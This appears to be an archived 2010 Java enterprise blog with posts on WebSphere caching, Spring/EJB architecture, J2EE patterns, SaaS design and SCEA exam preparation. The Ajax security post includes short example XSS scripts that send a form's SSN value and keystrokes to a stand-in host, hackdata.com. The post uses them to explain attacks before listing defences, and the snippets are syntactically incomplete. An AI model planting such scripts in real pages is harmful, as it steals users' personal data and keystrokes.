Tuesday, December 21, 2010

WebSphere's DynaCache Hibernate Caching Adapter

As WebSphere Application Server (especially 6.x) onwards, it supports JPA (Java Persistence APIs). Its default ORM tool is OpenJPA. It also supports easy plugging with other ORM tools. For distributed caching, WAS (WebSphere? Application Server) uses DynaCache for distributed caching and very useful in clustered environment. As it has pluggable caching architecture so any ORM tool can easily gets plugged with the ORM caching adapter.

As Hibernate is very famous and stable ORM tool. But it has an issues with WAS as it doesn't have a Hibernate caching adapter to plug with IBM's distributed caching framework.

So I decided to make WebSphere-Hibernate DynaCache adapter so that anyone can easily use the renowned Hibernate ORM.

Please visit my project at http://code.google.com/p/webspherehibernateadapter/ for more detail.

Monday, December 06, 2010

High Scalable and Distributed Architecture

This article describes how to achieve high scalability with Java EE EJB 3.0 and Spring Framework. Also how this hybrid solution can be scalable in a cloud space.

In an Enterprise world, Spring Framework with some standard ORM tool like Hibernate gained considerable acceptance as a light-weight architecture for mid size applications. Also in Java EE 5 specification, major changes has been done on component architecture, tried overcome the gaps like IoC, ORM etc.

Concept of IoC is still immature in the Java EE 5 and the flexibility, AOP, and relative strengths of Spring and ORM tool like Hibernate to further improve the productivity and quality of any web based applications. As JPA (part of Java EE 5) specification suggest pluggable design so we can use any ORM tool (compatible of JPA) in any application server like IBM WebSphere uses Apache OpenJPA as a default provider but Hibernate can easily be pluggable.

This article demonstrates how to build a highly scalable application with hybrid technology like EJB 3.0, Spring 3.0.x, and Hibernate. Also Spring Framework has its own remoting APIs and options but EJB is a standard specification and can easily be migrated across the application servers.
By designing a flexible and component architecture, the application will use the power of EJB 3.0, IoC & APO of Spring 3.0.x and ORM capability of Hibernate.

For more detail, visit my published article on theserverside website.

Sunday, September 05, 2010

Ajax and Web Application Security

Now a days, Ajax, meant for increase interactivity, application speed and usability; popularity becomes increasing because it internally uses "JavaScript" language which has a rich user
interface capability like dynamic form and its properties, pop-up controls, controls on information display, browser properties etc.

Ajax uses different web technologies like:
  • HTML or XHTML: It provide standards for displaying content display
  • Cascading Style Sheet (CSS): It also provide standards for displaying content display
  • JavaScript: It is a scripting language used for client side browser based applications
  • Document Object Model (DOM): It is a standard object model used for displaying dynamic content and related interaction.
  • XML and XSLT: It has a capability to manipulate, exchange and transferred data between client and server.
  • XML HTML Request (XMLHttpRequest): This client side JavaScript API used for HTTP connect to server and exchange information. Information can be plain text, XML or JSON.
  • JavaScript Object Notation (JSON): It is a lightweight, text-based and language independent data exchange format between client and server.
How its Works
Below figure shows the flow of AJAX request:

  • User generates an event or some asynchronous event fire at client end and result a JavaScript call
  • XMLHttpRequest JavaScript object request is created and configured with a request parameter along with event component identifier and user defined values (if any).
  • Above object makes a asynchronous call to web / application server. Call may be web-service, servlet, JSF's AJAX component etc.
  • Based on request, server may fetch the desired data from data store.
  • That data push back to client browser in form of plain text, XML or JSON.
  • XMLHttpRequest callback method received the data, processes it and updated the HTTP DOM representing the web-page with new information.
AJAX Security and Vulnerabilities
As AJAX has good UI (usability) capabilities but it has some security holes which makes web application vulnerable. Vulnerability can be at sever side and client side. As information flow between server and client in form of plain text, XML or JSON which eventually exposing server-side APIs and if insufficient security at server-side leads to unauthenticated access of system. Also usage of AJAX increases the chance of session management vulnerabilities and risk of access hidden URLs which are necessary for AJAX request to be processes.
Another issue with AJAX is visible data. XMLHttpRequest sends the plain visible text to server and may easily reveal database fields like Product Id, Customer Id which can be easily be manipulated by the hacker.

a.Effects of Attack:
  • Hacking Password and Cookies: Hacker can easily manipulate the sensitive information like password, cookies etc by injecting scripts in any part of DOM tree like:
function hackdata() {
var data = document.getElementById("ssn").value;
document.image[0].src = "http://hackdata.com/hackdata=" + data;
document.getElementById("button").onclick = hackdata;

Above example shows how hacker can steal the sensitive information.As soon as user clicks on submit button, a asynchronous request goes to hacker site with sensitive information. With the same approach, hacker can hack the cookies information.
  • Hacking keyboard events: Through key logger or mouse sniffer sensitive information can be captured like:
function hackdata(e) {
document.image[0].src = "http://hackdata.com/keydata=" + e.keyCode;

Same way, mouse event can be steal through mouse sniffer.

  • Inserting information: Attacker can modify the stylesheet to eliminate sensitive information such as making font color to white.
b.Best Practices:
Following are the best practices which need to be follow in AJAX based web application:

  • Data Validation: To avoid XSS (Cross Site Scripting), web application must do the input data validation. Input validation and filter out possible active and malicious content from untrusted input source.
  • Avoid Dynamic code generation & execution: Try to avoid dynamic code generation such as usage of eval method
  • Secure use of JSON: As JSON is subset of JavaScript so it may contain malicious code such as many JavaScript libraries use the eval() method to convert JSON into JavaScript objects. To avoid that use the regular expression defined in RFC 4627 to make sure that JSON doesn't have malicious code.
  • Use if "iFrame": Load the different domain data into iframe, which gives the advantage of JavaScript execution context & DOM tree its own. This prevents hacker from hacking from main page.
  • Use security testing tool: Always use vulnerability checking tool to detect the potential vulnerabilities in advance.
Above are few best practices which needs to follow to avoid from common AJAX attacks.

Wednesday, September 01, 2010

Messaging and Cloud Computing

In today's world, maintaining critical parameter of an application is a big challenge. Parameters like high performance, availability and scalability. This article will explain how to achieve high performance, availability and scalability with messaging technologies, WebSphere Application Server (WAS) and Service Integration Bus (SIB). It also includes hints and best practices and shows how to configure for high availability. Cloud enabler architecture can be achievable with WAS and SIB.

Sunday, August 29, 2010

Famous J2EE (Java EE) Design Patterns

As most of my friends and juniors occasionally ask about frequently and popular J2EE patterns. So I thought of listing down patterns which every Java developer or designer should know. I'm dividing patterns into presentation, business and integration tier.

List of popular patterns & its usage which comes under Presentation Tier:
1. Intercepting Filter:
  • It can be used when there is a requirement of centralized and common processing across requests
  • When pre and post processing is required across or selected requests
2. Front Controller (& Application Controller):
  • When there is a requirement of common logic to multiple requests
  • When there is a requirement of separate processing logic from the presentation view
  • When there is a requirement of centralized controlled access points
3. View Helper:
  • When template based views is required like JSP, Apache Velocity etc
  • When separate programming logic from view
4. Service To Worker:
  • Service To Worker = Front Controller + Application Controller + View Helper
  • Any presentation framework like Apache Struts

List of popular patterns & its usage which comes under Business Tier:
1. Business Delegate:
  • When business-tier access from presentation-tier
  • Hides service creation, invocation
2. Service Locator:
  • Patterns can be used when lookup to any enterprise resource like JNDI lookup, JMS, web services etc
  • When requirement of centralized and reuse (cache or reestablish connection) lookup
3. Session Facade:
  • When requirement is to avoid direct client access to application's business-tier
  • When requirement is to hide complex integration of business components
4. Transfer Object:
  • When requirement is to access component of different tier to retrieve and update data
  • When requirement is to reduce remote requests across the tier and network (enhance network performance)
5. Value List Handler:
  • When requirement is to avoid the overhead of using EJB "finder" methods
  • Requirement of an efficient search and iterate searched data
  • Cache search result on the server side

List of popular patterns & its usage which comes under Integration Tier:
1. Data Access Object:
  • Requirement of uniform data access APIs
  • Requirement of decouple persistent storage from other tier
2. Service Activator:
  • Requirement is to call business service, EJBs in an asynchronous manner
  • Requirement is to plug topic and point-to-point messaging to enable async process
3. Web Service Broker:
  • It is like exposing services to client i.e. web service
Above are main patterns which generally been used in J2EE based application. Some patterns which internally been used by frameworks like Apache Struts and Java EE components like JPA.

Friday, August 27, 2010

SaaS & Clould Computing - Design Consideration

Design a SaaS application is a big challenge. There are lots of dimension which we need to look upon while designing the application like maturity level, business goals, business & architecture principles, operational model etc.

According of Microsoft, SaaS application has a four maturity levels:
1. Ad Hoc/Custom: Each client or tenant has its own server instance and application code as modified to meet their requirements.

2. Configurable: In this level, each tenant or client hosts a separate instance of the application for each customer but the code-base remain same for each client i.e. application it quite configurable to support each customer.

3. Configurable, Multi-Tenant-Efficient: Each client or tenant runs on a single instance that serves every customer, with configurable metadata providing a unique user experience and feature set for each one. Only restriction of this level is that it can not be scalable across servers so performance and availability will be issue of this level.

4. Scalable, Configurable, Multi-Tenant-Efficient: This level multiple client or tenant are supported by the load-balanced farm of identical instances, with each tenant data/information kept separate, and with configurable metadata providing a unique user experience and feature set for each tenant/client.

As far as design and flexibility is concern, SaaS application should design for level 4.

Following are the design consideration of SaaS application:
1. Multi-Tenancy: Application should be design to handle multi-tenancy like data, UI, business rules etc should be separated per customer.

2. Security: Application design should ensure security of customer data is secure and there should be complete separation of data between customer/tenant. Also authentication should be "pluggable" to customer's enterprise identity management.

3. Availability: Application should be easily scalable and clusterable so that it is available anytime.

4. Scalable: Application design should be highly scalable and it should easily cope large organization and user base.

5. Data Model Extensibility: Database should be easily be tailor to the fulfill the need of each vendor without affecting the others.

6. Flexible Presentation: UI should be highly configurable and flexible so that it able be easily be customizable for each vendor without affecting the others.

7. Performance: Application should have less response time (for complex page also) and transactional processing time.

8. Configurable Business Rule/Process: Application should be design to support addition/customization of individual tenant/companies business rules/processes. Also application should seamlessly integrate with tenant's enterprise business processes.

9. Multi-language Support: Application should internationalization so that different tenant uses across the Internet and around the world.

10. Separation of Concern: Application should be design on concept of SOA and Separation of Concerns so that it can easily be deployed in cloud and cloud-bus can be plugged to communicate with different cloud and on-premises. Also business agility or time-to-market will be other advantage of this design pattern.

So, any application follow above design consideration then it can easily get the advantage of maturity "Level 4" and ported in cloud environment.

Friday, August 13, 2010

SaaS and Cloud Computing - An Overview

To understand SaaS in a simple way just think of email offering from Google (as gmail) where multiple clients i.e. email id owner can send / receive mails and can use other features provided by the Google.

Google's mail servers are in Cloud, which can be easily scalable. So this is a perfect example of SaaS and Cloud Computing.

Below figure help you in visualizing SaaS and Cloud Space:So SaaS can be offered as paid service like subscription service. These services can be form of domain specific application such as CRM, and SCM etc. For more detail, visit www.salesforce.com. salesforce application has a complete CRM solution deployed in his cloud environment. Generally vendor or site user will be charged on usage basis and each SaaS provider will has metering capability.

Other kind of service like free or partial free services such as web mail services (i.e. gmail), job site, etc.

Following are the main advantages while adopting SaaS option:
1. Faster time-to-market
2. Cost effective options (in most of case)
3. Lower license cost
4. Nearly zero maintenance and software upgrade cost
5. Good option for start-up companies.
6. Pay on usage basis

Apart from some good advantages, there are some issues and limitation of SaaS application:
1. Non-Scalable design: Generally SaaS application is expected to handle large customer base and scale seamlessly in cloud but non-scalability nature of SaaS application leads deterioration in performance.
2. Hidden cost of SaaS provider
3. Data Security as multiple user/customer will use the same database
4. Availability of SaaS application

Top SaaS Providers:

There are lots of SaaS providers in all the domain areas including CRM, SCM, Health Care, Retail etc. Following are the market leader in SaaS:

1. salesforce: It provide CRM software on-demand. It has various pricing model starting with free subscription, and pay-as-you-go model. Currently they offer two SaaS services:
  • Sales Cloud: It has accounts, contacts, leads, quotes, etc.
  • Service Cloud: It has customer portal, knowledge base, and analytics, etc.

2. Google: It has range of applications as well as web-based offerings. like e-mail service, calendar, document editor, spreadsheet, and some others.

3. Zoho: It has also web-based e-mail service, document editor, presentation tool, invoicing, reporting, applicant tracking, and many more.

Next topic which I will going to cover is SaaS & Cloud Computing - Application Design Consideration.

Thursday, August 12, 2010

Crack Sun Certified Enterprise Architect (SCEA) Exam

Most of the aspiring architects frequently asked me "how to clear SCEA (OCMJEA) exam" so I thought to write some basic points and approach to crack this exam.

This certification is very easy to pass if you have the understanding of design patterns. Understanding does not means that you know the definition of patterns, but it means you did some Java EE based application designing in past and applied various patterns. This will going to help you in answering patterns related questions as well as architecture related questions.

So if you have above experience then half of your battle won. And if you haven't done then its better to hold your horse and wait for some time .... some application design & apply patterns. "Practical experience is must" .......

Other things which you need to study like application security parameters, design consideration of thick client, EJB 3.0 usage, presentation framework, and application integration techniques.

Few good study materials are:

1. The Java EE 5 Tutorial, Third Edition (http://java.sun.com/javaee/5/docs/tutorial/doc/JavaEETutorial.pdf)

2. Core J2EE Patterns: Best Practices and Design Strategies, Second Edition

3. Java Design: Objects, UML, and Process

4. Designing Enterprise Applications with the J2EE Platform

5. Enterprise Integration Patterns

6. The Java EE 5Tutorial - For Sun Java System Application Server 9.1

7. Sun Certified Enterprise Architect for J2EE Study Guide

8. Core Security Patterns: Best Practices and Strategies for J2EE, Web Services, and Identity Management

For SCEA Part 2 & 3, refer my next article.